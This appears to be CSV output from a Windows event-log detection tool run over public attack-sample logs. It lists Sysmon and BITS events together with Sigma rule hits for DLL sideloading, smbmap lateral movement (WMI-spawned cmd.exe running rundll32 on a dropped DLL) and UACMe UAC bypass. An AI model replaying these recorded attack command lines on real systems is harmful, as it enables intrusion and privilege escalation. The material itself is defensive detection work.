http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 
10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 
0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 
+09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 
23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: 
HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 